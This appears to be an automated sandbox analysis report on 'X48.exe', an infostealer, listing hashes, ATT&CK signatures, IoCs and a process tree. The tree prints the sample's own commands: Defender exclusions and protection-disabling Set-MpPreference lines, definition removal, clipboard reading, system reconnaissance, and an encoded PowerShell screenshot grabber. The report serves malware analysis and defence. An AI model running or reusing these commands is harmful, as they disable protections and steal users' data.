9289b96bc0d0fa9b68d46d8bb7d6f124b4e5fb6336c98101ce168dd741903696

Analysis

max time kernel
152s
max time network
283s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
21/08/2024, 15:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Free/X48.exe
Size

7.4MB
MD5

10fe70731866bca261900d890a05471f
SHA1

3d94067acdf9042c9d40cf985cd1722de43d9a0e
SHA256

1dc25ba83f8d3656af620157c815b43446b05c97c2a2462182fc7e37f1d5365d
SHA512

9c87c6bfb16a1b831b30414c81d87e3cbdcafe26617472f2b1885587bc08404d56ef8b0185879ba3bd832277585afff4d213ffd9ae2a07bf264fa85f17b674e2
SSDEEP

98304:DRMc1hurErvz81LpWjjUlLkvzgXO9hAlaYrzzuJZYJ1JIuIdKU73bcgVowz8:D1urErvI9pWjgyvoaYrE41JIuIkoxM

Score

9^/10

collection credential_access defense_evasion discovery execution spyware stealer upx

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4992	powershell.exe
2856	powershell.exe
4600	powershell.exe
1232	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1832	cmd.exe
1208	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3984	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4420	X48.exe
4420	X48.exe
4420	X48.exe
4420	X48.exe
4420	X48.exe
4420	X48.exe
4420	X48.exe
4420	X48.exe
4420	X48.exe
4420	X48.exe
4420	X48.exe
4420	X48.exe
4420	X48.exe
4420	X48.exe
4420	X48.exe
4420	X48.exe
4420	X48.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/files/0x000100000002aaf3-21.dat	upx
behavioral4/memory/4420-25-0x00007FFFFB460000-0x00007FFFFBA50000-memory.dmp	upx
behavioral4/files/0x000100000002aae6-27.dat	upx
behavioral4/memory/4420-30-0x00007FF80D570000-0x00007FF80D594000-memory.dmp	upx
behavioral4/files/0x000100000002aaf1-29.dat	upx
behavioral4/files/0x000100000002aaed-47.dat	upx
behavioral4/files/0x000100000002aaec-46.dat	upx
behavioral4/files/0x000100000002aaeb-45.dat	upx
behavioral4/files/0x000100000002aaea-44.dat	upx
behavioral4/memory/4420-48-0x00007FF816B10000-0x00007FF816B1F000-memory.dmp	upx
behavioral4/files/0x000100000002aae9-43.dat	upx
behavioral4/files/0x000100000002aae8-42.dat	upx
behavioral4/files/0x000100000002aae7-41.dat	upx
behavioral4/files/0x000100000002aae5-40.dat	upx
behavioral4/files/0x000100000002aaf8-39.dat	upx
behavioral4/files/0x000100000002aaf7-38.dat	upx
behavioral4/files/0x000100000002aaf6-37.dat	upx
behavioral4/files/0x000100000002aaf2-34.dat	upx
behavioral4/files/0x000100000002aaf0-33.dat	upx
behavioral4/memory/4420-54-0x00007FF80C750000-0x00007FF80C77D000-memory.dmp	upx
behavioral4/memory/4420-60-0x00007FFFFAB20000-0x00007FFFFAC96000-memory.dmp	upx
behavioral4/memory/4420-58-0x00007FF80C670000-0x00007FF80C693000-memory.dmp	upx
behavioral4/memory/4420-56-0x00007FF815C60000-0x00007FF815C79000-memory.dmp	upx
behavioral4/memory/4420-74-0x00007FF80D570000-0x00007FF80D594000-memory.dmp	upx
behavioral4/memory/4420-78-0x00007FF811230000-0x00007FF81123D000-memory.dmp	upx
behavioral4/memory/4420-80-0x00007FFFFAE80000-0x00007FFFFAF9C000-memory.dmp	upx
behavioral4/memory/4420-76-0x00007FF80D1D0000-0x00007FF80D1E4000-memory.dmp	upx
behavioral4/memory/4420-73-0x00007FFFFA520000-0x00007FFFFAA49000-memory.dmp	upx
behavioral4/memory/4420-71-0x00007FFFFAA50000-0x00007FFFFAB1D000-memory.dmp	upx
behavioral4/memory/4420-70-0x00007FFFFB460000-0x00007FFFFBA50000-memory.dmp	upx
behavioral4/memory/4420-66-0x00007FF80C470000-0x00007FF80C4A3000-memory.dmp	upx
behavioral4/memory/4420-64-0x00007FF8129C0000-0x00007FF8129CD000-memory.dmp	upx
behavioral4/memory/4420-62-0x00007FF812860000-0x00007FF812879000-memory.dmp	upx
behavioral4/memory/4420-103-0x00007FF80C670000-0x00007FF80C693000-memory.dmp	upx
behavioral4/memory/4420-104-0x00007FFFFAB20000-0x00007FFFFAC96000-memory.dmp	upx
behavioral4/memory/4420-123-0x00007FF812860000-0x00007FF812879000-memory.dmp	upx
behavioral4/memory/4420-188-0x00007FF80C470000-0x00007FF80C4A3000-memory.dmp	upx
behavioral4/memory/4420-204-0x00007FFFFAA50000-0x00007FFFFAB1D000-memory.dmp	upx
behavioral4/memory/4420-226-0x00007FFFFA520000-0x00007FFFFAA49000-memory.dmp	upx
behavioral4/memory/4420-227-0x00007FF80D1D0000-0x00007FF80D1E4000-memory.dmp	upx
behavioral4/memory/4420-234-0x00007FFFFAB20000-0x00007FFFFAC96000-memory.dmp	upx
behavioral4/memory/4420-229-0x00007FF80D570000-0x00007FF80D594000-memory.dmp	upx
behavioral4/memory/4420-242-0x00007FFFFAE80000-0x00007FFFFAF9C000-memory.dmp	upx
behavioral4/memory/4420-228-0x00007FFFFB460000-0x00007FFFFBA50000-memory.dmp	upx
behavioral4/memory/4420-257-0x00007FFFFAE80000-0x00007FFFFAF9C000-memory.dmp	upx
behavioral4/memory/4420-253-0x00007FFFFAA50000-0x00007FFFFAB1D000-memory.dmp	upx
behavioral4/memory/4420-260-0x00007FF816B10000-0x00007FF816B1F000-memory.dmp	upx
behavioral4/memory/4420-259-0x00007FF80D570000-0x00007FF80D594000-memory.dmp	upx
behavioral4/memory/4420-258-0x00007FFFFA520000-0x00007FFFFAA49000-memory.dmp	upx
behavioral4/memory/4420-252-0x00007FF80C470000-0x00007FF80C4A3000-memory.dmp	upx
behavioral4/memory/4420-248-0x00007FF80C670000-0x00007FF80C693000-memory.dmp	upx
behavioral4/memory/4420-247-0x00007FF815C60000-0x00007FF815C79000-memory.dmp	upx
behavioral4/memory/4420-256-0x00007FF811230000-0x00007FF81123D000-memory.dmp	upx
behavioral4/memory/4420-255-0x00007FF80D1D0000-0x00007FF80D1E4000-memory.dmp	upx
behavioral4/memory/4420-251-0x00007FF8129C0000-0x00007FF8129CD000-memory.dmp	upx
behavioral4/memory/4420-249-0x00007FFFFAB20000-0x00007FFFFAC96000-memory.dmp	upx
behavioral4/memory/4420-250-0x00007FF812860000-0x00007FF812879000-memory.dmp	upx
behavioral4/memory/4420-246-0x00007FF80C750000-0x00007FF80C77D000-memory.dmp	upx
behavioral4/memory/4420-243-0x00007FFFFB460000-0x00007FFFFBA50000-memory.dmp	upx

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
7	discord.com
12	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
3112	tasklist.exe
3828	tasklist.exe
3492	tasklist.exe
2448	tasklist.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4520	WMIC.exe
1108	WMIC.exe
3488	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1812	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
4600	powershell.exe
1232	powershell.exe
4600	powershell.exe
1232	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
3900	powershell.exe
3900	powershell.exe
3900	powershell.exe
4992	powershell.exe
4992	powershell.exe
3896	powershell.exe
3896	powershell.exe
2856	powershell.exe
2856	powershell.exe
688	powershell.exe
688	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3112	tasklist.exe
Token: SeDebugPrivilege	4600	powershell.exe
Token: SeDebugPrivilege	1232	powershell.exe
Token: SeIncreaseQuotaPrivilege	4428	WMIC.exe
Token: SeSecurityPrivilege	4428	WMIC.exe
Token: SeTakeOwnershipPrivilege	4428	WMIC.exe
Token: SeLoadDriverPrivilege	4428	WMIC.exe
Token: SeSystemProfilePrivilege	4428	WMIC.exe
Token: SeSystemtimePrivilege	4428	WMIC.exe
Token: SeProfSingleProcessPrivilege	4428	WMIC.exe
Token: SeIncBasePriorityPrivilege	4428	WMIC.exe
Token: SeCreatePagefilePrivilege	4428	WMIC.exe
Token: SeBackupPrivilege	4428	WMIC.exe
Token: SeRestorePrivilege	4428	WMIC.exe
Token: SeShutdownPrivilege	4428	WMIC.exe
Token: SeDebugPrivilege	4428	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4428	WMIC.exe
Token: SeRemoteShutdownPrivilege	4428	WMIC.exe
Token: SeUndockPrivilege	4428	WMIC.exe
Token: SeManageVolumePrivilege	4428	WMIC.exe
Token: 33	4428	WMIC.exe
Token: 34	4428	WMIC.exe
Token: 35	4428	WMIC.exe
Token: 36	4428	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4428	WMIC.exe
Token: SeSecurityPrivilege	4428	WMIC.exe
Token: SeTakeOwnershipPrivilege	4428	WMIC.exe
Token: SeLoadDriverPrivilege	4428	WMIC.exe
Token: SeSystemProfilePrivilege	4428	WMIC.exe
Token: SeSystemtimePrivilege	4428	WMIC.exe
Token: SeProfSingleProcessPrivilege	4428	WMIC.exe
Token: SeIncBasePriorityPrivilege	4428	WMIC.exe
Token: SeCreatePagefilePrivilege	4428	WMIC.exe
Token: SeBackupPrivilege	4428	WMIC.exe
Token: SeRestorePrivilege	4428	WMIC.exe
Token: SeShutdownPrivilege	4428	WMIC.exe
Token: SeDebugPrivilege	4428	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4428	WMIC.exe
Token: SeRemoteShutdownPrivilege	4428	WMIC.exe
Token: SeUndockPrivilege	4428	WMIC.exe
Token: SeManageVolumePrivilege	4428	WMIC.exe
Token: 33	4428	WMIC.exe
Token: 34	4428	WMIC.exe
Token: 35	4428	WMIC.exe
Token: 36	4428	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4520	WMIC.exe
Token: SeSecurityPrivilege	4520	WMIC.exe
Token: SeTakeOwnershipPrivilege	4520	WMIC.exe
Token: SeLoadDriverPrivilege	4520	WMIC.exe
Token: SeSystemProfilePrivilege	4520	WMIC.exe
Token: SeSystemtimePrivilege	4520	WMIC.exe
Token: SeProfSingleProcessPrivilege	4520	WMIC.exe
Token: SeIncBasePriorityPrivilege	4520	WMIC.exe
Token: SeCreatePagefilePrivilege	4520	WMIC.exe
Token: SeBackupPrivilege	4520	WMIC.exe
Token: SeRestorePrivilege	4520	WMIC.exe
Token: SeShutdownPrivilege	4520	WMIC.exe
Token: SeDebugPrivilege	4520	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4520	WMIC.exe
Token: SeRemoteShutdownPrivilege	4520	WMIC.exe
Token: SeUndockPrivilege	4520	WMIC.exe
Token: SeManageVolumePrivilege	4520	WMIC.exe
Token: 33	4520	WMIC.exe
Token: 34	4520	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1048 wrote to memory of 4420	1048	X48.exe	82
PID 1048 wrote to memory of 4420	1048	X48.exe	82
PID 4420 wrote to memory of 1360	4420	X48.exe	83
PID 4420 wrote to memory of 1360	4420	X48.exe	83
PID 4420 wrote to memory of 2684	4420	X48.exe	84
PID 4420 wrote to memory of 2684	4420	X48.exe	84
PID 4420 wrote to memory of 4896	4420	X48.exe	87
PID 4420 wrote to memory of 4896	4420	X48.exe	87
PID 4420 wrote to memory of 2408	4420	X48.exe	130
PID 4420 wrote to memory of 2408	4420	X48.exe	130
PID 4896 wrote to memory of 3112	4896	cmd.exe	91
PID 4896 wrote to memory of 3112	4896	cmd.exe	91
PID 2684 wrote to memory of 4600	2684	cmd.exe	92
PID 2684 wrote to memory of 4600	2684	cmd.exe	92
PID 1360 wrote to memory of 1232	1360	cmd.exe	93
PID 1360 wrote to memory of 1232	1360	cmd.exe	93
PID 2408 wrote to memory of 4428	2408	cmd.exe	94
PID 2408 wrote to memory of 4428	2408	cmd.exe	94
PID 4420 wrote to memory of 1432	4420	X48.exe	96
PID 4420 wrote to memory of 1432	4420	X48.exe	96
PID 1432 wrote to memory of 3776	1432	cmd.exe	145
PID 1432 wrote to memory of 3776	1432	cmd.exe	145
PID 4420 wrote to memory of 2728	4420	X48.exe	99
PID 4420 wrote to memory of 2728	4420	X48.exe	99
PID 2728 wrote to memory of 3144	2728	cmd.exe	101
PID 2728 wrote to memory of 3144	2728	cmd.exe	101
PID 4420 wrote to memory of 1996	4420	X48.exe	102
PID 4420 wrote to memory of 1996	4420	X48.exe	102
PID 1996 wrote to memory of 4520	1996	cmd.exe	104
PID 1996 wrote to memory of 4520	1996	cmd.exe	104
PID 4420 wrote to memory of 4556	4420	X48.exe	105
PID 4420 wrote to memory of 4556	4420	X48.exe	105
PID 4556 wrote to memory of 1108	4556	cmd.exe	107
PID 4556 wrote to memory of 1108	4556	cmd.exe	107
PID 4420 wrote to memory of 3520	4420	X48.exe	108
PID 4420 wrote to memory of 3520	4420	X48.exe	108
PID 4420 wrote to memory of 2396	4420	X48.exe	109
PID 4420 wrote to memory of 2396	4420	X48.exe	109
PID 4420 wrote to memory of 2044	4420	X48.exe	112
PID 4420 wrote to memory of 2044	4420	X48.exe	112
PID 4420 wrote to memory of 3412	4420	X48.exe	115
PID 4420 wrote to memory of 3412	4420	X48.exe	115
PID 4420 wrote to memory of 1832	4420	X48.exe	114
PID 4420 wrote to memory of 1832	4420	X48.exe	114
PID 4420 wrote to memory of 3916	4420	X48.exe	116
PID 4420 wrote to memory of 3916	4420	X48.exe	116
PID 3520 wrote to memory of 3492	3520	cmd.exe	120
PID 3520 wrote to memory of 3492	3520	cmd.exe	120
PID 2396 wrote to memory of 3828	2396	cmd.exe	121
PID 2396 wrote to memory of 3828	2396	cmd.exe	121
PID 2044 wrote to memory of 3756	2044	cmd.exe	122
PID 2044 wrote to memory of 3756	2044	cmd.exe	122
PID 3412 wrote to memory of 2448	3412	cmd.exe	123
PID 3412 wrote to memory of 2448	3412	cmd.exe	123
PID 1832 wrote to memory of 1208	1832	cmd.exe	124
PID 1832 wrote to memory of 1208	1832	cmd.exe	124
PID 3916 wrote to memory of 3860	3916	cmd.exe	125
PID 3916 wrote to memory of 3860	3916	cmd.exe	125
PID 4420 wrote to memory of 3736	4420	X48.exe	126
PID 4420 wrote to memory of 3736	4420	X48.exe	126
PID 4420 wrote to memory of 1524	4420	X48.exe	128
PID 4420 wrote to memory of 1524	4420	X48.exe	128
PID 4420 wrote to memory of 2400	4420	X48.exe	129
PID 4420 wrote to memory of 2400	4420	X48.exe	129

C:\Users\Admin\AppData\Local\Temp\Free\X48.exe
"C:\Users\Admin\AppData\Local\Temp\Free\X48.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1048
- C:\Users\Admin\AppData\Local\Temp\Free\X48.exe
  "C:\Users\Admin\AppData\Local\Temp\Free\X48.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Free\X48.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1360
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Free\X48.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2684
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4896
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2408
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1432
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:3776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2728
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:3144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1996
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4556
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3520
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2396
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2044
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:3756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:1832
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:1208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3412
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3916
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3736
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:1524
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2408
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
